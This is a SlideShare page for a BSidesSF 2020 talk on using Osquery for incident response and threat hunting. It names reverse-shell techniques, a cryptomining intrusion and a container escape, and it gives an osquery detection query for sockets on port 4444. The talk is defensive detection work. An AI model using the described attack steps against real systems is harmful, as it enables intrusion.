SlideShare a Scribd company logo

Leveraging Osquery for DFIR @ Scale _BSidesSF_2020

Download as PPTX, PDF
Sohini Mukherjee, profile picture
Sohini Mukherjee

The document discusses using the open-source Osquery tool for digital forensics and incident response at scale. Osquery allows querying operating systems to retrieve information about running processes, network connections, user accounts, file changes and other artifacts through SQLite. It can help with rapid incident response, fast forensics and proactive threat hunting. The document provides examples of how Osquery can detect techniques like reverse shells and crypto mining and gather evidence about potential attacks. It also discusses using Osquery to detect privileged container exploits and escapes.

Engineering
1 of 33
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Leveraging Osquery for DFIR at scale Sohini Mukherjee | Security Researcher @ Adobe
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Agenda  Rapid Incident Response  Fast Forensics  Proactive Threat Hunting 2
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Needle in a haystack?  Running processes  Active network connections  New user accounts  Detect file system changes  Kernel Modules loaded  Evidence of Persistence  Evidence of Code Injection  Non-standard Running Services 3
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Can Osquery help?  Abstracts the OS to SQL (SQLite)  Open-Source, active development  Cross-platform  Light-weight agent  Non-intrusive: user-mode 4 Reference: https://blog.kolide.com/profiling-osquery-performance-with-kolide-cloud-8e01097469db
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Some Osquery statements.. 5
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Osquery Deployment.. 6 1. osquery enrolls or polls 2. TLS endpoint responds with a query 3. osquery replies with results
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Kolide Fleet – Open Source Osquery Manager 7
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Kolide Fleet Portal 8
© 2019 Adobe. All Rights Reserved. Adobe Confidential. @ Scale.. 9
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Potential Attack Scenarios
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Attack Scenario : Reverse Shells 11
© 2019 Adobe. All Rights Reserved. Adobe Confidential. 12
© 2019 Adobe. All Rights Reserved. Adobe Confidential. 13
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Reverse Shell : Mshta : MITRE [T1170] 14
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Reverse Shell : Regsvr32 : MITRE [T1117] 15
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Reverse Shell : DLL Injection : MITRE [T1055] 16
© 2019 Adobe. All Rights Reserved. Adobe Confidential. DLLInjection: Detections 17 • Pstree with active network sockets • https://github.com/facebook/osquery/blob/master/specs/processes.table
© 2019 Adobe. All Rights Reserved. Adobe Confidential. DLLInjection: Detections 18 • Injection (malicious msf.dll) as seen by process_memory_map table • https://github.com/facebook/osquery/blob/master/specs/process_memory_map.table
© 2019 Adobe. All Rights Reserved. Adobe Confidential. DLLInjection: Evidence gathering 19 • File System Metadata for evidence of time of execution • https://github.com/facebook/osquery/blob/master/specs/utility/file.table
© 2019 Adobe. All Rights Reserved. Adobe Confidential. CryptoMining 20
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Attack Scenario 21 4. The miner establishes connection to its pool 2. Attacker establishes alternate access by creating a new user 1. Attacker authenticates with stolen credentials 3. The new user installs and starts the miner
© 2019 Adobe. All Rights Reserved. Adobe Confidential. 22
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Detection via Kolide Fleet deployment 23 • Suspicious process on a non-standard network socket • select s.pid, p.name, local_address, remote_address, family, protocol, local_port, remote_port from process_open_sockets s join processes p on s.pid = p.pid where remote_port like 4444
© 2019 Adobe. All Rights Reserved. Adobe Confidential. How does it look like in SIEM? 24
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Detection from artifacts 25
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Container Exploit 26
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Privileged Container/ Container escape attempt 27 Container Container Container Container Container Privileged
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Can we detect it? 28 • Container running in privileged mode with the root user without any Security Profiles
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Docker queries  Docker_open_sockets: 29
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Container Exploit Scenario 30
© 2019 Adobe. All Rights Reserved. Adobe Confidential. References  https://osquery.io/  https://github.com/facebook/osquery  https://github.com/teoseller/osquery-attck  https://github.com/polylogyx/osq-ext-bin  https://github.com/osql/extensions  https://github.com/gcmurphy/windmill  https://github.com/osquery/osquery-python  https://blog.trailofbits.com/2018/05/28/collect-ntfs-forensic-information-with-osquery/ 31
© 2019 Adobe. All Rights Reserved. Adobe Confidential. Thank You
Leveraging Osquery for DFIR @ Scale _BSidesSF_2020

More Related Content

PPTX
The New Security Practitioner
Adrian Sanabria
 
PPTX
Equifax Breach Postmortem
Adrian Sanabria
 
PPTX
Agile Network India | DevSecOps - The What and the Why | Ritesh Shregill
AgileNetwork
 
PDF
Introducing a Security Feedback Loop to your CI Pipelines
Codefresh
 
PPTX
Integrate Security into DevOps - SecDevOps
Ulf Mattsson
 
PPTX
DevSecOps without DevOps is Just Security
Kevin Fealey
 
PPTX
Elizabeth Lawler - Devops, security, and compliance working in unison
DevSecCon
 
PDF
Dev week cloud world conf2021
Archana Joshi
 
The New Security Practitioner
Adrian Sanabria
 
Equifax Breach Postmortem
Adrian Sanabria
 
Agile Network India | DevSecOps - The What and the Why | Ritesh Shregill
AgileNetwork
 
Introducing a Security Feedback Loop to your CI Pipelines
Codefresh
 
Integrate Security into DevOps - SecDevOps
Ulf Mattsson
 
DevSecOps without DevOps is Just Security
Kevin Fealey
 
Elizabeth Lawler - Devops, security, and compliance working in unison
DevSecCon
 
Dev week cloud world conf2021
Archana Joshi
 

What's hot (19)

PDF
Hacking IoT with EXPLIoT Framework
Priyanka Aash
 
PDF
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula
 
PPTX
Practical Secure Coding Workshop - {DECIPHER} Hackathon
Stefan Streichsbier
 
PPTX
A journey from dev ops to devsecops
Veritis Group, Inc
 
PPTX
Why cloud native envs deserve better security - Dima Stopel, Twistlock - Clou...
Cloud Native Day Tel Aviv
 
PPTX
Practical DevSecOps Using Security Instrumentation
VMware Tanzu
 
PDF
Chaos engineering for cloud native security
Kennedy
 
PPTX
AllDayDevOps 2019 AppSensor
jtmelton
 
PPTX
The path of secure software by Katy Anton
DevSecCon
 
PPTX
Overcoming Security Challenges in DevOps
Alert Logic
 
PPTX
Outpost24 webinar: cloud providers ate hosting companies' lunch, what's next?...
Outpost24
 
PPTX
Outpost24 webinar : how to secure your data in the cloud - 06-2018
Outpost24
 
PPTX
Finding Security a Home in a DevOps World
Shannon Lietz
 
PDF
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon
 
PDF
Think Like a Hacker: Using Network Analytics and Attack Simulation to Find an...
Skybox Security
 
PPT
Bio IT World 2015 - DevOps Security and Transparency
Kevin Gilpin
 
PDF
SBA Security Meetup - Deploying and managing azure sentinel as code by Bojan ...
SBA Research
 
PPTX
Locking Down Your Cloud
2nd Sight Lab
 
PPTX
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Hacking IoT with EXPLIoT Framework
Priyanka Aash
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula
 
Practical Secure Coding Workshop - {DECIPHER} Hackathon
Stefan Streichsbier
 
A journey from dev ops to devsecops
Veritis Group, Inc
 
Why cloud native envs deserve better security - Dima Stopel, Twistlock - Clou...
Cloud Native Day Tel Aviv
 
Practical DevSecOps Using Security Instrumentation
VMware Tanzu
 
Chaos engineering for cloud native security
Kennedy
 
AllDayDevOps 2019 AppSensor
jtmelton
 
The path of secure software by Katy Anton
DevSecCon
 
Overcoming Security Challenges in DevOps
Alert Logic
 
Outpost24 webinar: cloud providers ate hosting companies' lunch, what's next?...
Outpost24
 
Outpost24 webinar : how to secure your data in the cloud - 06-2018
Outpost24
 
Finding Security a Home in a DevOps World
Shannon Lietz
 
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon
 
Think Like a Hacker: Using Network Analytics and Attack Simulation to Find an...
Skybox Security
 
Bio IT World 2015 - DevOps Security and Transparency
Kevin Gilpin
 
SBA Security Meetup - Deploying and managing azure sentinel as code by Bojan ...
SBA Research
 
Locking Down Your Cloud
2nd Sight Lab
 
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Ad

Similar to Leveraging Osquery for DFIR @ Scale _BSidesSF_2020 (20)

PDF
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
PPTX
Webinar–Reviewing Modern JavaScript Applications
Synopsys Software Integrity Group
 
PDF
RICOH THETA x IoT Developers Contest : Cloud API Seminar
contest-theta360
 
PPTX
OpenWhisk JavaOne
Luc Desrosiers
 
PDF
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at BSides Delh...
Riddhi Shree
 
PDF
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at c0c0n XII)
Riddhi Shree
 
PDF
Security Patterns for Microservice Architectures - London Java Community 2020
Matt Raible
 
PPTX
Securing your web applications in CF 2016
Pavan Kumar
 
PDF
Security Patterns for Microservice Architectures - Oktane20
Matt Raible
 
PDF
2023 Patch Tuesday de Octubre
Ivanti
 
PDF
Webinar–Vulnerabilities in Containerised Production Environments
Synopsys Software Integrity Group
 
PPTX
Securing Containers - Sathyajit Bhat - Adobe
CodeOps Technologies LLP
 
PPT
Keeping your options open
Doug Tidwell
 
PPTX
July Patch Tuesday 2019
Ivanti
 
PDF
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Matt Raible
 
PDF
IBM WebSphere Liberty and Docker Deep Dive
David Currie
 
PDF
Français Patch Tuesday – Octobre
Ivanti
 
PDF
2023 October Patch Tuesday
Ivanti
 
PPTX
Do Try This at Home! Extend IBM Connections using IBM Worklight
Prolifics
 
PDF
Building and Deploying Cloud Native Applications
Manish Kapur
 
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
Webinar–Reviewing Modern JavaScript Applications
Synopsys Software Integrity Group
 
RICOH THETA x IoT Developers Contest : Cloud API Seminar
contest-theta360
 
OpenWhisk JavaOne
Luc Desrosiers
 
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at BSides Delh...
Riddhi Shree
 
VyAPI - A Modern Cloud Based Vulnerable Android App (Presented at c0c0n XII)
Riddhi Shree
 
Security Patterns for Microservice Architectures - London Java Community 2020
Matt Raible
 
Securing your web applications in CF 2016
Pavan Kumar
 
Security Patterns for Microservice Architectures - Oktane20
Matt Raible
 
2023 Patch Tuesday de Octubre
Ivanti
 
Webinar–Vulnerabilities in Containerised Production Environments
Synopsys Software Integrity Group
 
Securing Containers - Sathyajit Bhat - Adobe
CodeOps Technologies LLP
 
Keeping your options open
Doug Tidwell
 
July Patch Tuesday 2019
Ivanti
 
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Matt Raible
 
IBM WebSphere Liberty and Docker Deep Dive
David Currie
 
Français Patch Tuesday – Octobre
Ivanti
 
2023 October Patch Tuesday
Ivanti
 
Do Try This at Home! Extend IBM Connections using IBM Worklight
Prolifics
 
Building and Deploying Cloud Native Applications
Manish Kapur
 
Ad

Recently uploaded (20)

PDF
keyrequirementskkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
mojeeburahmanwardak
 
PPTX
OOP with Java - Java Introduction (Basics)
Rashmi T V
 
PDF
SM_6th-Sem__Cse_Internet-of-Things.pdf IOT
smceramu
 
PPTX
Construction Project Organization Group 2.pptx
vj5agdales
 
PPTX
FINAL REVIEW FOR COPD DIANOSIS FOR PULMONARY DISEASE.pptx
rubeshbme
 
PPTX
Engineering Ethics, Safety and Environment [Autosaved] (1).pptx
MehrabTaseenTalukder
 
PDF
Mitigating Risks through Effective Management for Enhancing Organizational Pe...
IJAEMSJORNAL
 
PPTX
Fundamentals of safety and accident prevention -final (1).pptx
Palani kumar
 
PDF
III.4.1.2_The_Space_Environment.p pdffdf
sittiporn2
 
PDF
BMEC211 - INTRODUCTION TO MECHATRONICS-1.pdf
ryankakungu
 
PPTX
UNIT 4 Total Quality Management .pptx
gokuld13012005
 
PDF
R24 SURVEYING LAB MANUAL for civil enggi
MNANDITHACIVILSTAFF
 
PPTX
M Tech Sem 1 Civil Engineering Environmental Sciences.pptx
ShriNRPrasad
 
PPTX
Sustainable Sites - Green Building Construction
mhdumerali
 
PPTX
additive manufacturing of ss316l using mig welding
premcdr7799
 
PPTX
Foundation to blockchain - A guide to Blockchain Tech
Davies Chacko
 
PPTX
CARTOGRAPHY AND GEOINFORMATION VISUALIZATION chapter1 NPTE (2).pptx
abhi1361yadav
 
PDF
Automation-in-Manufacturing-Chapter-Introduction.pdf
pcmth867
 
PDF
Human-AI Collaboration: Balancing Agentic AI and Autonomy in Hybrid Systems
ijccsa
 
PDF
Well-logging-methods_new................
ZafriFarid
 
keyrequirementskkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
mojeeburahmanwardak
 
OOP with Java - Java Introduction (Basics)
Rashmi T V
 
SM_6th-Sem__Cse_Internet-of-Things.pdf IOT
smceramu
 
Construction Project Organization Group 2.pptx
vj5agdales
 
FINAL REVIEW FOR COPD DIANOSIS FOR PULMONARY DISEASE.pptx
rubeshbme
 
Engineering Ethics, Safety and Environment [Autosaved] (1).pptx
MehrabTaseenTalukder
 
Mitigating Risks through Effective Management for Enhancing Organizational Pe...
IJAEMSJORNAL
 
Fundamentals of safety and accident prevention -final (1).pptx
Palani kumar
 
III.4.1.2_The_Space_Environment.p pdffdf
sittiporn2
 
BMEC211 - INTRODUCTION TO MECHATRONICS-1.pdf
ryankakungu
 
UNIT 4 Total Quality Management .pptx
gokuld13012005
 
R24 SURVEYING LAB MANUAL for civil enggi
MNANDITHACIVILSTAFF
 
M Tech Sem 1 Civil Engineering Environmental Sciences.pptx
ShriNRPrasad
 
Sustainable Sites - Green Building Construction
mhdumerali
 
additive manufacturing of ss316l using mig welding
premcdr7799
 
Foundation to blockchain - A guide to Blockchain Tech
Davies Chacko
 
CARTOGRAPHY AND GEOINFORMATION VISUALIZATION chapter1 NPTE (2).pptx
abhi1361yadav
 
Automation-in-Manufacturing-Chapter-Introduction.pdf
pcmth867
 
Human-AI Collaboration: Balancing Agentic AI and Autonomy in Hybrid Systems
ijccsa
 
Well-logging-methods_new................
ZafriFarid
 

Leveraging Osquery for DFIR @ Scale _BSidesSF_2020

  • 1. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Leveraging Osquery for DFIR at scale Sohini Mukherjee | Security Researcher @ Adobe
  • 2. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Agenda  Rapid Incident Response  Fast Forensics  Proactive Threat Hunting 2
  • 3. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Needle in a haystack?  Running processes  Active network connections  New user accounts  Detect file system changes  Kernel Modules loaded  Evidence of Persistence  Evidence of Code Injection  Non-standard Running Services 3
  • 4. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Can Osquery help?  Abstracts the OS to SQL (SQLite)  Open-Source, active development  Cross-platform  Light-weight agent  Non-intrusive: user-mode 4 Reference: https://blog.kolide.com/profiling-osquery-performance-with-kolide-cloud-8e01097469db
  • 5. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Some Osquery statements.. 5
  • 6. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Osquery Deployment.. 6 1. osquery enrolls or polls 2. TLS endpoint responds with a query 3. osquery replies with results
  • 7. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Kolide Fleet – Open Source Osquery Manager 7
  • 8. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Kolide Fleet Portal 8
  • 9. © 2019 Adobe. All Rights Reserved. Adobe Confidential. @ Scale.. 9
  • 10. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Potential Attack Scenarios
  • 11. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Attack Scenario : Reverse Shells 11
  • 12. © 2019 Adobe. All Rights Reserved. Adobe Confidential. 12
  • 13. © 2019 Adobe. All Rights Reserved. Adobe Confidential. 13
  • 14. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Reverse Shell : Mshta : MITRE [T1170] 14
  • 15. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Reverse Shell : Regsvr32 : MITRE [T1117] 15
  • 16. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Reverse Shell : DLL Injection : MITRE [T1055] 16
  • 17. © 2019 Adobe. All Rights Reserved. Adobe Confidential. DLLInjection: Detections 17 • Pstree with active network sockets • https://github.com/facebook/osquery/blob/master/specs/processes.table
  • 18. © 2019 Adobe. All Rights Reserved. Adobe Confidential. DLLInjection: Detections 18 • Injection (malicious msf.dll) as seen by process_memory_map table • https://github.com/facebook/osquery/blob/master/specs/process_memory_map.table
  • 19. © 2019 Adobe. All Rights Reserved. Adobe Confidential. DLLInjection: Evidence gathering 19 • File System Metadata for evidence of time of execution • https://github.com/facebook/osquery/blob/master/specs/utility/file.table
  • 20. © 2019 Adobe. All Rights Reserved. Adobe Confidential. CryptoMining 20
  • 21. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Attack Scenario 21 4. The miner establishes connection to its pool 2. Attacker establishes alternate access by creating a new user 1. Attacker authenticates with stolen credentials 3. The new user installs and starts the miner
  • 22. © 2019 Adobe. All Rights Reserved. Adobe Confidential. 22
  • 23. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Detection via Kolide Fleet deployment 23 • Suspicious process on a non-standard network socket • select s.pid, p.name, local_address, remote_address, family, protocol, local_port, remote_port from process_open_sockets s join processes p on s.pid = p.pid where remote_port like 4444
  • 24. © 2019 Adobe. All Rights Reserved. Adobe Confidential. How does it look like in SIEM? 24
  • 25. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Detection from artifacts 25
  • 26. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Container Exploit 26
  • 27. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Privileged Container/ Container escape attempt 27 Container Container Container Container Container Privileged
  • 28. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Can we detect it? 28 • Container running in privileged mode with the root user without any Security Profiles
  • 29. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Docker queries  Docker_open_sockets: 29
  • 30. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Container Exploit Scenario 30
  • 31. © 2019 Adobe. All Rights Reserved. Adobe Confidential. References  https://osquery.io/  https://github.com/facebook/osquery  https://github.com/teoseller/osquery-attck  https://github.com/polylogyx/osq-ext-bin  https://github.com/osql/extensions  https://github.com/gcmurphy/windmill  https://github.com/osquery/osquery-python  https://blog.trailofbits.com/2018/05/28/collect-ntfs-forensic-information-with-osquery/ 31
  • 32. © 2019 Adobe. All Rights Reserved. Adobe Confidential. Thank You

Editor's Notes

  • #25: Discussion on artifacts
  • #28: Running misconfigured containers in Prod or any environment can lead to vulnerable scenarios. E.g. Running Privileged Containers, Running without Security Restrictions like AppArmor, Conrainers running as root. An attacker might exploit an Application vulnerability and compromise a Container and with enough elevated privileges , might be able to break in to the underlying Host Kernel space. And eventually, move laterally to other Containers sharing the same host kernelspace and say, starts running Miners in all Production Containers. Container Forensics is challenging – one of the many reasons being short-lived nature of Containers. That’s how Containers are supposed to be. However, we can audit for this security misconfigurations and remediate those proactively before a compromise actually takes place
  • #30: We can use more complex osquery statements to audit for Docker Open Sockets And as we have seen from our previous examples – Open Sockets might lead to pretty interesting information For proactive theat-hunting, we might want to do an Outlier Analysis beyond a baseline of known good. E.g. A newly seen process is running out of an unexpected file path and reaching out to a first-seen set of IP Addresses – not necessarily malicious but gives you an interesting subset of information to investigate further on. And this is not just related to Containers, we can apply the same logic to more conventional environments as well.
  • #31: But what if none of these Security flaws were detected or remediated and an attacker has been able to compromise ang gain access to a Container Let’s try to put us in the attacker’s shoes The attacker might want to download more malicious code in to the Container – or say, try to install and start running a miner And he might just use a command like “curl” or “wget” to do so And if this is not a commandline that’s expected in your runtime environment – that might just give you a very critical heads-up that some anomaly has just happened in your Container environment
  • #32: As we approach the concluding part of the talk, I would want to reiterate that all that we have discussed today are not necessarily limited to just Osquery We can extrapolate the detection mechanisms and apply to any Commercial EDR tool that you might be running or even better , build your own framework and open-source it It’s basically unleashing the power of Open-Source and contribute to it – so that we , as a community, can be a step ahead of the bad guys